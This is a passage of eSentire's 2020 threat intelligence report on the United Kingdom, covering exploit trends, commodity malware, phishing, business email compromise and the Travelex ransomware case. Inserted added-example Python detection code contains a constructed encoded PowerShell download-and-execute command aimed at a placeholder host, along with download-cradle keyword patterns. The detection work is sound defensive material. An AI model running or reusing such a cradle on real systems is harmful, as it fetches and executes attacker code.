2020 eSentire Threat Intelligence Spotlight: United Kingdom

Observations and Perspectives



Table of Contents

3 FOREWORD

4 INTRODUCTION

4 Quantifying Risk

5 The COVID Complication

7 THE U.K. THREAT LANDSCAPE

7 Remote Exploits

8 Commodity Malware

10 MalDocs

11 Phishing

12 Business Email Compromise

13 Ransomware and Hands-on-Keyboard Attacks

15 CONCLUSIONS AND GENERAL RECOMMENDATIONS

17 METHODOLOGY

18 REFERENCES

2020 eSentire Threat Intelligence Spotlight: U.K. (June 2020)

Foreword

In the eSentire 2019 Annual Global Threat Intelligence Report, we shine a spotlight on the pervasiveness of commodity malware, increased coordination across criminal groups, business email compromise attacks and the rise of hands-on keyboard attacks associated with ransomware.

In this report—our second to focus on the United Kingdom—we discuss trends observed in our U.K. customer base over the past 12 months in the context of the broader threat landscape.

The first few months of 2020 have created new opportunities for attackers as the world grapples with COVID-19 and many organisations adopt work from home (WFH) policies to maintain operations. For attackers, this sudden shift presents an expanded threat surface featuring remote work technologies that were, in many cases, hastily introduced. Our experience reveals that the more distributed a workforce and the more complex the technology stack, the higher the likelihood of an organisation experiencing a security incident.

Modern threats have shown the ability to readily bypass legacy antivirus solutions, and adversaries are adept at taking advantage of vulnerability windows. Organisations need solutions that can harden endpoints, prevent polymorphic malware and fileless attacks, mitigate malicious code execution and provide investigation and remediation capabilities with dynamic response to security incidents.

This latter point—the need for rapid response and containment—cannot be overstated. As unwelcome an idea as it is, every organisation should consider that it’s only a matter of time until a serious security incident occurs.

The Managed Detection and Response (MDR) category, which eSentire pioneered and continues to lead, is based on the combined premise that adversaries are always ahead of defences, all businesses are at risk of a cyberattack at some point in time and that purely preventative controls and traditional managed security solutions do not adequately protect a business from potential threats.

To combat and contain threats, eSentire MDR provides full telemetry and visibility across on-premises and cloud environments with integrated machine learning analysis, enabling our Security Operations Centres (SOCs) to quickly detect and contain attacks, thereby minimising the probability of a breach and lowering the risk to business operations.


Introduction

Today’s organisations face a wide array of cyberthreats. As businesses adopt cloud-based services and employ a distributed workforce (made even more distributed by the COVID-19 pandemic), this always-connected model increases the attack surface—the collection of points a malicious actor can use to try to gain access.

While all organisations must manage these risks, small and medium businesses (SMBs) are particularly vulnerable. Most SMBs don’t have access to the same resources and expertise as their enterprise cousins, and the result is that their security posture—the overall security status of their infrastructure—has failed to keep pace with either the expanding threat surface or the ongoing evolution of threats.

Unfortunately, the factors outlined above exist against a backdrop of a global shortage of cybersecurity professionals.

Just how big is the gap? In a study released in November 2019, non-profit IT security organisation (ISC)² stated that, “the industry continues to struggle with a significant workforce shortage, and it would take another 4 million professionals to close the gap.”[1]

This shortage means that it can be very difficult for organisations of all sizes, even those which are sophisticated and well-funded, to attract the level of cybersecurity expertise needed to harden defences against attacks.

Quantifying Risk

The most effective way to quantify the risk to U.K. organisations is to examine the recent past:

• A GDPR compliance survey commissioned by Egress stated that 37 percent of U.K. companies reported a data breach incident to the Information Commissioner’s Office (ICO) in the preceding 12 months, with 17 percent reporting more than one incident.[2]

• The Department for Digital, Culture, Media & Sport’s Cyber Security Breaches Survey 2020 indicated that 46 percent of U.K. businesses reported experiencing “any kind of cyber security breach or attack in the last 12 months.”[3]

• In the 2019 Ponemon State of Endpoint Risk Study, 68 percent of survey respondents indicated that their organisations suffered an endpoint attack resulting in a data asset and/or IT infrastructure compromise.

• VMware Carbon Black’s Global Threat Report Series suggested that up to 88 percent of U.K. companies suffered breaches in the 12 months preceding the report.[4]

Why is it so difficult to pin down a precise number? Beyond the usual challenges and biases inherent in surveys, one other potential reason is that what constitutes an “event” varies. Often, cyberattacks are classified by severity as events, incidents or breaches.


• Events include minor issues with no impact to business. This could be as simple as a firewall or endpoint protection solution blocking an unauthorised attempt to connect to the network or preventing malware installation.

• Incidents are more serious, and relate to violations of the firm’s cybersecurity, privacy or compliance policies. Examples include unauthorised access to confidential data (like medical records or client files at a law firm) or improper management of data by employees (such as transporting data on a USB drive). An incident may not require official reporting to the governing regulatory authority.

• Some incidents become data breaches in which the exposure of non-public information meets a specific legal definition, as defined by an industry regulator, privacy legislation or state breach legislation. The Ponemon Cost of a Data Breach study reports that the average cost of a data breach in the U.K. is £2.7 million.[5]

While it’s impossible to predict with precision the harm caused by any particular future incident, it’s still possible to make informed strategic and operational decisions about managing cyber risk. Determining what is most prudent and practical for your organisation requires understanding your own circumstances and the wider cyberthreat environment.

By shining a light on cybercrime—including the players, their motivations, tactics and targets—we hope to bring data and insights to conversations which can be dominated by opinion and guesswork.

The COVID Complication

In 2020, the world is grappling with the first modern pandemic. While governments rushed to “break the chain” and “flatten the curve,” businesses faced ongoing existential crises and completely new remote working scenarios—on top of the mental load of new professional and personal stressors.

Reports quickly emerged of threats using COVID-19 messages as lures, including a CoronavirusSafetyMeasures.PDF which deploys a remote access tool (RAT) and malware,[6] and a malicious Microsoft Office document purportedly from the Ukrainian Ministry of Health which deploys keylogging and other malware.[7]

The United States’ Federal Trade Commission reported in mid-April that scammers had already pulled in $12 million USD in coronavirus-related scams, although the global figure is likely much higher.[8]

On 8 April 2020, the U.K.’s National Cyber Security Centre (NCSC) and U.S. Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) issued a joint threat advisory.[9]

But COVID-related lures aren’t the only new development. With the dramatic increase in the use of remote working tools—including VPNs, remote desktop and collaboration software[10]—cybercriminals are focusing commodity malware and drive-by activities on these technologies.


Here are a few tips to strengthen your defences. While these are general best practices, they are even more important as threat actors opportunistically take advantage of confusion and chaos.

• Review remote access protocols: Criminals know your employees are working from home, frequently employing VPNs. Be on the look-out for phishing lures designed to harvest VPN credentials and be sure to reset passwords, require multi-factor authentication and restrict access to critical information not required for everyday duties.

• Protect your endpoints, mobile and IoT devices: As more employees work remotely, it’s critical to expand your umbrella of protection to include those distributed laptops, tablets and phones. Consider Endpoint Protection Platforms (EPPs) and Endpoint Detection and Response (EDR) solutions.

• Inform your employees: Remind employees that criminals will attempt to take advantage of the chaos created by COVID-19 through fraudulent invoicing and fake donation sites on social media. Remind your employees to remain vigilant and follow security best practices.

• Don’t forget your supply chain: Speak to critical vendors to identify risks in your supply chain (perhaps you have strong protocols for COVID-19, but your vendors might not).

For more recommendations specifically relating to securing your organisation during the pandemic, please see our dedicated COVID-19 Cybersecurity Resources[11] page.


The U.K. Threat Landscape

Like organisations everywhere, those operating in the U.K. face a range of threats. In each subsection to follow, we outline a threat, provide direct observations or general commentary and outline some practical defences.

Remote Exploits

Network-borne exploits are a constant threat against connected systems. Attackers (perhaps the term “script kiddies” would be more accurate) and “grey hat” researchers leverage a penetration testing tool like Metasploit and scan networks for vulnerable devices, operating systems and applications.

Short-term changes are more likely the result of a new exploit being added to the scanning tools than anything more meaningful; longer-term trends, though, can be instructive as they can suggest which vulnerabilities are most at risk.

Looking at higher-volume attempts observed in the U.K. between May 1, 2019 and April 30, 2020, Figure 1 shows that PHP exploits are a constant threat while attempts against IoT devices have increased. In addition to an October surge in attacks against Zyxel home routers, we can also see an increase in Mirai botnet variants in December 2019 (and lasting through at least the end of April 2020), which Palo Alto Networks’ Unit 42 attributed to the return of ECHOBOT.[12]

Turning our attention to lower-volume attempts (Figure 2), we can see items worthy of note:

• Other home routers remain a very popular target, falling just below our threshold for high-volume attempts

• SQL exploits sharply declined at the end of 2019

• January, February and March 2020 showed a sudden jump in observed exploit attempts against Citrix[13]

• A gradual increase in attempts using Remote Desktop Protocol (RDP)

These latter two observations are potentially related to the COVID-19 pandemic: Citrix exploits are often associated with GoToMeeting, a popular virtual meeting tool, and RDP is often used by remote workers and IT organisations.

Figure 1—Higher-volume exploit attempts observed against eSentire's U.K. customer base
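As an added example (not eSentire's code or data), the Python below shows the kind of per-category monthly aggregation behind Figures 1 and 2, plus a simple baseline check that flags the "sudden jump" the text describes for Citrix while leaving a steady category such as PHP alone. The alert-line format, the signature names, the category mapping and the sample lines are all constructed for this example.

```python
"""Monthly trending of network exploit attempts from IDS/IPS alert lines.

Added example, not eSentire's code or data: it aggregates alert lines by
exploit category per month, as Figures 1 and 2 do, and flags a month whose
volume jumps well above the category's earlier baseline. The alert-line
format, the signature names and the sample lines are constructed.
"""
import re
from collections import Counter, defaultdict
from statistics import median

# Constructed alert-line format (hypothetical IDS export):
#   <ISO 8601 timestamp> <src_ip> -> <dst_ip>:<port> sig=<signature name>
LINE_RE = re.compile(
    r"^(?P<month>\d{4}-\d{2})-\d{2}T\d{2}:\d{2}:\d{2}Z "
    r"(?P<src>[\d.]+) -> (?P<dst>[\d.]+):\d+ sig=(?P<sig>\S+)$"
)

# Signature-name prefixes mapped to the coarse categories the report uses (constructed).
CATEGORY_PREFIXES = {
    "php_": "PHP",
    "zyxel_": "Zyxel router",
    "mirai_": "Mirai variant",
    "citrix_": "Citrix",
    "rdp_": "RDP",
    "sql_": "SQL",
}


def categorise(signature):
    """Map a signature name to a report category; unknown names become 'Other'."""
    name = signature.lower()
    for prefix, category in CATEGORY_PREFIXES.items():
        if name.startswith(prefix):
            return category
    return "Other"


def monthly_counts(lines):
    """Return {category: {"YYYY-MM": count}}; malformed lines are skipped, not fatal."""
    counts = defaultdict(Counter)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            counts[categorise(m["sig"])][m["month"]] += 1
    return {cat: dict(months) for cat, months in counts.items()}


def find_surges(counts, factor=3.0, min_history=2):
    """Flag (category, month, count) where count >= factor x median of earlier months.

    Short-term noise (a new signature added to scanners) is expected, so the
    check only fires once a category has some history to compare against.
    """
    surges = []
    for category, months in counts.items():
        history = []
        for month in sorted(months):
            n = months[month]
            if len(history) >= min_history and n >= factor * median(history):
                surges.append((category, month, n))
            history.append(n)
    return surges


def _synth(month, signature, n):
    """Build n constructed alert lines for one month and signature (RFC 5737 test addresses)."""
    return [
        f"{month}-{(i % 28) + 1:02d}T12:00:00Z 203.0.113.{(i % 250) + 1}"
        f" -> 198.51.100.7:443 sig={signature}"
        for i in range(n)
    ]


# Constructed sample: a steady PHP background and a Citrix category that jumps in January.
SAMPLE_ALERTS = (
    _synth("2019-11", "php_cgi_probe", 40)
    + _synth("2019-12", "php_cgi_probe", 42)
    + _synth("2020-01", "php_cgi_probe", 38)
    + _synth("2019-11", "citrix_gateway_probe", 2)
    + _synth("2019-12", "citrix_gateway_probe", 3)
    + _synth("2020-01", "citrix_gateway_probe", 30)
    + ["not an alert line at all"]  # exercises the malformed-line path
)

if __name__ == "__main__":
    for category, month, n in find_surges(monthly_counts(SAMPLE_ALERTS)):
        print(f"surge: {category} in {month} ({n} attempts)")
```

The median-based baseline is deliberately crude: it is meant to pick out the kind of step change the text attributes to a new exploit entering the scanning tools, not to replace a proper time-series model.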


Defence Recommendations

Most remote exploits can be mitigated by a combination of minimising the exposed threat surface and following a diligent patching regime. Additionally, organisations should:

• Implement monitoring and detection of asset exposure to external networks

• Consider two-factor authentication for externally-facing remote access points

• Implement strong perimeter protections, such as application firewalls or IPS systems, to prevent known attacks from reaching potentially vulnerable devices that must be exposed to provide services

Commodity Malware

Commodity malware is readily available (including as a service) and can be incorporated into highly automated campaigns. Driven by significant financial rewards and operating as a mature industry, these malware threats continue to evolve:[14]

• Polymorphism creates an ever-changing threat that can readily bypass antivirus solutions, whether traditional or powered by machine learning techniques, by rapidly mutating into new variants

• Fileless malware has soared in prevalence since 2017; this threat leverages existing software, permitted applications and authorised protocols to carry out malicious activities

• Many malware families can detect when they are being executed in a sandbox, allowing them to actively thwart security research

• Access to offensive security tools and compromise-as-a-service has lowered the barriers to entry, allowing lower-skilled groups to punch above their weight

Often, malware will arrive through email disguised as a software update (in the U.K. we observed malware impersonating browser updates, Adobe Flash and Wi-Fi cameras) or through a browser via a drive-by download.

Commodity malware caused 21 percent of the serious incidents we observed directly in the U.K., with attacks attributable to five malware families: XMR Coinminer, MoqHao, SocGholish, Shlayer and MsraMiner.

Figure 2—Lower-volume exploit attempts observed against eSentire's U.K. customer base


Example: Containment in Just 22 Minutes

As evidenced by the Travelex incident (outlined on pg.12) and other high-profile attacks, minimising threat actor dwell time is a crucial element of avoiding or limiting the consequences of a security incident.

In May 2019, esENDPOINT alerted the eSentire SOC to a potential threat within one of our financial clients: in an instance of a drive-by download, a user on a monitored corporate asset unknowingly downloaded and launched a malicious JavaScript file via Internet Explorer.

SOC analysts reviewed network traffic captured at the time of the compromise and discovered that a potentially malicious web redirect via a website related to the SocGholish cybercrime campaign may have instigated the infection.

Once the malicious JavaScript file was executed, it downloaded two other tools, one of which took two screenshots of the infected machine’s desktop. Network traffic revealed that the screenshots were sent back to the attacker, potentially as a means of gaining intelligence about the environment in which the payload was activated.

The second tool downloaded was a remote control launcher. It was saved to disk, renamed and then executed. Once executed, it launched the built-in Windows Remote Access Tool, which was recorded establishing a connection to an external channel; this is the likely command-and-control channel used for the malicious activity that immediately followed.

Just a few seconds after the remote control session was created via the Remote Assistance tool, persistent malware was installed on the victim host. From there, lateral movement began. By this point, about 10 minutes had passed since the initial JavaScript download.

An encoded PowerShell command was executed that downloaded an RC4-encrypted second-stage PowerShell script and launched it. As soon as the attacker used a PowerShell command, eSentire’s proprietary BlueSteel machine learning tool picked up on the suspicious activity and another alert was generated.

The command was executed under the user’s normal account, without local admin privileges. After downloading and decrypting the second-stage PowerShell script, the attacker scanned the local network for the purpose of infecting additional machines. Two additional hosts on the local network were subsequently compromised through use of a lateral movement PowerShell script and Windows Management Instrumentation (WMI) remote PowerShell invocation.

The combination of esENDPOINT (which detected the malicious JavaScript file), machine learning from BlueSteel (which detected the malicious PowerShell command) and esNETWORK (which alerted on the suspicious web redirect) traced the entire attack, allowing rapid synthesis and remediation of the threat before the attacker could reach their objective. Our SOC team successfully isolated the three compromised hosts and terminated the attacker’s command and control channel, preventing further activities.

The total elapsed time from JavaScript download to attack containment was 22 minutes.

16:38:05 UTC – Initial infection on host STM112 via malicious JS script

16:38:23 UTC – Remote control session established to the attacker

16:38:27 UTC – Screenshots of victim’s desktop taken and sent to attacker

16:43:48 UTC – Persistent malware installed on host STM112

16:52:08 UTC – Lateral movement PowerShell script executed by attacker

16:54:55 UTC – Host STM34 compromised via WMI remote PowerShell invocation

16:55:00 UTC – Host STM33 compromised via WMI remote PowerShell invocation

17:00:00 UTC – SOC sends malware alert to customer and quarantines the affected hosts
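The sequence above (an encoded PowerShell command fetching a second stage, then PowerShell invoked through WMI on further hosts) is what endpoint process telemetry lets a SOC catch. The Python below is an added example, not eSentire's or BlueSteel's code: it runs those two detections over constructed process-creation events shaped after the timeline and computes the time-to-containment figure. The event schema, the user name, the file paths and the encoded command are constructed; only the host names and timestamps are taken from the timeline.

```python
"""Detections for encoded PowerShell download cradles and WMI-spawned
PowerShell, run over constructed process-creation events, plus the
time-to-containment figure a SOC reports.

Added example, not eSentire's code. Event schema, user, paths and the
encoded command are constructed; hosts and times follow the timeline.
"""
import base64
import binascii
import re
from datetime import datetime

# Strings that typically appear in a PowerShell download cradle.
CRADLE_MARKERS = ("net.webclient", "downloadstring", "downloadfile",
                  "invoke-expression", "iex", "frombase64string")
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if absent or invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except binascii.Error:
        return None


def classify(event):
    """Detection names that fire for one process-creation event."""
    hits = []
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(event["command_line"])
        if decoded is not None:
            hits.append("encoded_powershell")
            if any(marker in decoded.lower() for marker in CRADLE_MARKERS):
                hits.append("download_cradle")
        if parent.endswith("wmiprvse.exe"):  # WMI provider host spawning a shell: remote invocation
            hits.append("wmi_spawned_powershell")
    return hits


def run_detections(events):
    """Return (time, host, detection) for every detection across the events."""
    return [(ev["time"], ev["host"], name) for ev in events for name in classify(ev)]


def minutes_to_containment(events, containment_time):
    """Minutes from the earliest event to containment, rounded to the nearest minute."""
    fmt = "%H:%M:%S"
    first = min(datetime.strptime(ev["time"], fmt) for ev in events)
    return round((datetime.strptime(containment_time, fmt) - first).total_seconds() / 60)


# Constructed second stage and its -EncodedCommand form (UTF-16LE, then base64).
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.invalid/s2.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16le")).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed, modelled on the timeline above
    {"time": "16:38:05", "host": "STM112", "user": "CORP\\jdoe",
     "parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\jdoe\Downloads\update.js"'},
    {"time": "16:52:08", "host": "STM112", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": f"powershell.exe -NoP -W Hidden -enc {_ENCODED}"},
    {"time": "16:54:55", "host": "STM34", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": _PS,
     "command_line": "powershell.exe -NoP -NonI -c $env:COMPUTERNAME"},
    {"time": "16:55:00", "host": "STM33", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": _PS,
     "command_line": "powershell.exe -NoP -NonI -c $env:COMPUTERNAME"},
]
CONTAINMENT_TIME = "17:00:00"

if __name__ == "__main__":
    for time_, host, name in run_detections(SAMPLE_EVENTS):
        print(f"{time_} {host}: {name}")
    print(f"time to containment: {minutes_to_containment(SAMPLE_EVENTS, CONTAINMENT_TIME)} min")
```

Note that the wscript.exe launch at 16:38:05 produces no alert here; that first step was caught by endpoint file analysis in the case, not by command-line inspection, which is why the text stresses combining several telemetry sources.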


Defence Recommendations

To improve defences against commodity malware, we recommend that organisations:

• Deliver malware awareness training to institute best practices (for example, mousing over links to inspect them, examining sender details, reporting anything suspicious, not clicking links, and contacting/verifying the sender and request by a different channel)

• Keep browsers up to date and employ security strategies including disabling JavaScript

• Enforce the use of multi-factor authentication for corporate email accounts

• Deploy spam filtering, URL rewriting and attachment sandboxing

• Block macros in Microsoft Office documents that originate from the internet

• Block Microsoft Office execution from temporary directories such as those used by Outlook and internet browsers

• Ensure employees are particularly cautious of generic Office 365-related communications

Additionally, administrators may want to implement rules to redirect emails, including redirecting storage service links to a monitored inbox.

MalDocs

Many malware families—including Emotet, Ursnif and Dridex—most frequently gain initial access through an attachment disguised as an invoice or other important file, either sent directly to financial departments or through an intermediary. The term “malicious document” (MalDoc) refers to these files; while the attachments are often weaponised Microsoft Office files, malicious JavaScript files and other formats are not uncommon.

This approach requires human interaction to initiate the malicious activities; like phishing, MalDocs are attractive for attackers because they target human operators as the initial attack vector. Upon successful infection, the malware can spread laterally to other hosts in the network. If left untreated, response and clean-up can become costly.

Threat actors are constantly adjusting their MalDoc lures to optimise open rates. MalDocs caused 36 percent of the serious incidents we observed in the U.K., with the most frequently observed lures being:

1. Quotes and RFQs

2. Invoices, Purchase Orders and Shipping Documents

3. Financial Statements, Account Statements and Bank Notifications

4. Scanned Documents

Defence Recommendations

Because email is the most common attack vector for MalDocs, organisations can improve defences by ensuring they:

• Block macros in Microsoft Office documents that originate from the internet

• Deploy spam filtering, URL rewriting and attachment sandboxing; administrators may also want to implement rules to redirect emails, including redirecting storage service links to a monitored inbox

• Block Microsoft Office execution from temporary directories such as those used by Outlook and internet browsers

• Deliver MalDoc awareness training to institute best practices (for example, taking time to inspect and examine attachments before opening them, examining sender details, reporting anything suspicious, not clicking links, and contacting/verifying the sender and request by a different channel)

• Ensure employees are particularly cautious of generic Office 365-related communications


Phishing

Of the incidents we observed in which there was a credential dump, domain controller compromise or other serious bypass of defences, 36 percent were attributable to a successful phishing attack.

Phishing’s goal is to deceive a human operator into taking an action that benefits the attacker, such as disclosing sensitive information or downloading and executing a malicious file. Because phishing relies on tricking a victim, it remains an attractive technique to attackers as security postures steadily harden.

Threat actors employ multiple phishing methods, including sending links, attaching malicious documents or engaging in social engineering to compromise the user. While email remains the most frequent medium, social media, text and messaging apps are also employed and may take advantage of higher user trust (or lower user threat awareness).

Attackers rely on a range of lures, which are tweaked and managed in much the same way that legitimate businesses manage their own email campaigns. In 2019, the top lures we saw in the U.K. were:

1. Site/Service (e.g., Apple, eBay)

2. Email (e.g., Office 365, Hotmail, generic account verifications)

3. Financial (e.g., income tax, PayPal)

4. File Share (e.g., Dropbox, OneDrive)

5. Company Event

Phishing in the Cloud with Customised Office 365 Pages

In our Annual Threat Intelligence Report: 2019 Perspectives and 2020 Predictions, we revealed that threat actors have embraced the cloud for phishing campaigns. Because many organisations use cloud services legitimately, it’s difficult to configure filtering defences—whether by IP or by URL—which will not also interfere with regular business operations.

In the report, we outlined a phishing campaign using Microsoft Azure cloud services to host Office 365 phishing pages. Since publishing that report in January 2020, eSentire Threat Intelligence has continued to research this emerging trend. One recent finding is that in addition to deploying convincing Office 365 phishing attacks by hosting pages on trusted cloud services, attackers have added the ability to automatically customise these pages to the target organisation’s branding (Figure 3).

Figure 3—Microsoft allows organisations to customise their Office 365 login page for users to match company branding; attackers have developed techniques to customise this branding to impersonate trusted log-in pages, as this proof-of-concept illustrates


This technique appears to abuse a Microsoft feature meant to allow companies to customise the Office 365 login page for their users. By customising the Office 365 branding automatically and in real time, this technique reduces the effort required to conduct convincing phishing attacks at scale.

In nearly all cases of cloud-hosted phishing, the heavy lifting is performed by a separate, attacker-controlled website. This site hosts a number of PHP scripts which validate the target email, proxy requests for branding files and collect and store credentials.

For more information about this evolving threat, please see the eSentire blog post New BOLO: Phishing Attacks that Customize O365 Pages with Your Branding, which includes details, defence recommendations and indicators.[15]

Defence Recommendations

To defend against phishing attacks, we recommend organisations:

• Enforce the use of multi-factor authentication for corporate email accounts

• Deliver phishing awareness training to institute best practices (for example, mousing over links to inspect them, examining sender details, reporting anything suspicious, not clicking links, and contacting/verifying the sender and request by a different channel)

• Introduce procedures for reporting phishing and sharing confirmed reported phishing attempts, which help employees quickly identify phishing indicators

• Deploy spam filtering, URL rewriting and attachment sandboxing

• Block macros in Microsoft Office documents that originate from the internet

• Block Microsoft Office execution from temporary directories such as those used by Outlook and internet browsers

• Ensure employees are particularly cautious of generic Office 365-related communications

Additionally, administrators may want to implement rules to redirect emails, including redirecting storage service links to a monitored inbox.
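Two of the recommendations in the phishing and MalDoc sections (redirecting storage service links to a monitored inbox, and examining sender details) can also be applied mechanically at the mail gateway. The Python below is an added example, not eSentire's code: it parses an RFC 5322 message, flags a Reply-To on a different domain, a display name carrying an address from another domain, a sender domain that merely resembles the organisation's own, and any link to a file-storage service, and then decides whether the message should be routed to a monitored inbox. The storage-domain list, the finding names, the `internal_domain` parameter and both sample messages are constructed.

```python
"""Mail-gateway checks derived from the recommendations above: route messages
carrying file-storage links to a monitored inbox and surface sender-detail
anomalies. Added example, not eSentire's code; the domain list, finding
names and sample messages are constructed."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed policy list: links to these services are routed for review.
STORAGE_DOMAINS = {"dropbox.com", "onedrive.live.com", "1drv.ms",
                   "sharepoint.com", "drive.google.com", "wetransfer.com"}
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)
HOST_RE = re.compile(r"^https?://([^/:?#]+)", re.IGNORECASE)
EMBEDDED_ADDR_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")


def host_matches(host, domains):
    """True if host equals, or is a subdomain of, any listed domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def _squash(domain):
    """Normalise a domain for lookalike comparison: lowercase, letters and digits only."""
    return re.sub(r"[^a-z0-9]", "", domain.lower())


def extract_urls(msg):
    """Collect URLs from every text part of the message."""
    urls = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            raw = part.get_payload(decode=True) or b""
            urls.extend(URL_RE.findall(raw.decode(part.get_content_charset() or "utf-8", "replace")))
    return urls


def analyse_message(raw_message, internal_domain):
    """Return findings, storage links and the routing action for one RFC 5322 message."""
    msg = message_from_string(raw_message)
    display, from_addr = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    internal_domain = internal_domain.lower()
    findings = []

    # Reply-To on another domain than From: replies go somewhere the sender does not control.
    if reply_to and reply_to.rpartition("@")[2].lower() != from_domain:
        findings.append("reply_to_mismatch")
    # Display name that itself contains an address from a different domain.
    embedded = EMBEDDED_ADDR_RE.search(display)
    if embedded and embedded.group(1).lower() != from_domain:
        findings.append("display_name_address_mismatch")
    # External sender whose domain resembles ours once punctuation is stripped (corp-example.co).
    if from_domain != internal_domain and _squash(internal_domain) in _squash(from_domain):
        findings.append("lookalike_internal_domain")

    storage_links = []
    for url in extract_urls(msg):
        host = HOST_RE.match(url)
        if host and host_matches(host.group(1), STORAGE_DOMAINS):
            storage_links.append(url)
    if storage_links:
        findings.append("storage_service_link")

    action = "monitored_inbox" if findings else "deliver"
    return {"from": from_addr, "findings": findings, "storage_links": storage_links, "action": action}


# Constructed sample messages (RFC 2606 / .invalid names; not real senders).
SUSPICIOUS_MSG = """\
From: "Jane Smith (CEO)" <jane.smith@corp-example.co>
Reply-To: jane.smith.ceo@mail.invalid
To: accounts@corp.example
Subject: Urgent: invoice for payment today
Content-Type: text/plain; charset="utf-8"

Please process the attached invoice before 5pm. The file is here:
https://www.dropbox.com/s/abc123/invoice.pdf
Thanks, Jane
"""

BENIGN_MSG = """\
From: Pat Lee <pat.lee@corp.example>
To: accounts@corp.example
Subject: Q2 numbers
Content-Type: text/plain; charset="utf-8"

Attached as discussed. Internal wiki: https://wiki.corp.example/q2
"""

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS_MSG), ("benign", BENIGN_MSG)):
        print(name, analyse_message(raw, "corp.example"))
```

The lookalike check is intentionally loose (it would also flag a genuine partner domain that happens to contain the organisation's name), which is why the action is routing to a monitored inbox for a human decision rather than outright rejection.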

Business Email Compromise

Business email compromise aims at facilitating fraudulent money transfers via two methods:

• Account takeover, in which an attacker gains complete access to and control over a victim’s email account.

• Account impersonation, in which an attacker attempts to fool a victim into taking some unknowingly malicious action (often at the behest of an authority figure or colleague).

Threat actors use these accounts, which often belong to executives, to request new payments and to hijack or redirect upcoming payments.

In some instances, business email compromise becomes just one tool within a larger “cultural engineering” attack. For example, a special report in Private Equity Wire described a 2019 attack in which attackers—through patience and sophistication—tricked three finance sector firms into transferring £1.1M, of which only half was recovered.[16]


Defence Recommendations

To defend against the financial risks of account takeovers (beyond the defences which should be in place to prevent the initial takeover) and impersonation, we recommend that organisations enforce the use of out-of-band communications to confirm and authorise large transactions.

Additionally, organisations should:

• Educate employees about impersonation attacks, including showing real examples with screenshots and redacted personal and numerical info.

• Ensure everyone in the company, including executives, follows security and operational processes; importantly, executives should set an example by strictly adhering to any processes in place, so that any requests that do not follow the established process stand out as inherently unusual.

• Suggest that employees who are not required to be public-facing avoid posting their corporate email address on networking sites such as LinkedIn.

Ransomware and Hands-on-Keyboard Attacks

Although we did not directly observe any such successful attacks within our U.K. customer base, 2019 saw a jump in ransomware specifically targeting enterprise networks. In particular, threat actors enjoyed success targeting organisations including governments, Managed Service Providers (MSPs) and large businesses—entities which have an urgent motivation to avoid downtime and easier access to larger funds than most individual targets.

These sophisticated, targeted attacks require much more manual effort and attention and so earn the qualifier “hands-on-keyboard.” They differ from early ransomware activity, which opportunistically infected individual users, largely through automated means including malicious emails and drive-by downloads.

The inflection point may have been the extremely destructive Atlanta ransomware event in March 2018, perpetrated by the SamSam group, which caused millions of dollars of damage and significant downtime to public services. At the same time, commodity ransomware has received considerable attention from the security community (especially following WannaCry), and observed coinmining attacks fluctuate with the market price of cryptocurrency.

Research and observations suggest that a significant proportion of 2019’s hands-on-keyboard ransomware incidents can be traced to a relatively small number of malware groups: SamSam, Ryuk, Robbinhood, REvil (Sodinokibi), GoGalocker and GlobeImposter.

Travelex: A Portent of a New Threat

As the calendar flipped to 2020, a sophisticated attack was reaching a crescendo: after initially declaring a global system outage as maintenance downtime, Travelex disclosed a week later that they were the victims of a cyberattack dating to 31 December 2019.

As new details came to light, they painted a picture of a new multifaceted threat.


What immediately emerged was that Travelex’ operations were severely disrupted by a massive ransomware attack, believed to be perpetrated by the REvil group, in which the attackers were demanding £4.6 million.17 News coverage suggested that the service outages were so severe that Travelex was forced to conduct currency transactions with manual calculations in their exchange offices.

Subsequent reports indicated that the attackers were threatening to release 5 GB of data including the dates of birth, credit card information and national insurance numbers of Travelex clients.18 This threat effectively weaponises the fines built into GDPR as yet another way of applying pressure—beyond the impact to Travelex’ daily business operations and the damage already done to the company’s reputation.

Two initial questions asked by observers were:

1. How did the ransomware hit so much of Travelex’ network simultaneously?

2. How did the attackers acquire the data they were threatening to release?

The answer to both questions seems to be that the attackers had extensive access to Travelex’ systems for up to six months.19

It is believed that after gaining initial access (suspicion immediately fell on vulnerable Pulse Secure VPN servers20), the attack operators evaded defences by employing hands-on-keyboard techniques; that is, the attack—at least to some extent—was manually directed. This approach, which often leverages stolen or purchased credentials, allowed the attackers to learn the lay of the land, quietly exfiltrate the private data and plant the ransomware “bombs” throughout the Travelex network.

Then, on 31 December, those bombs were detonated, ultimately costing Travelex untold sums in brand damage and lost business, plus the nearly £1.9 million bitcoin ransom The Wall Street Journal reported they paid.21

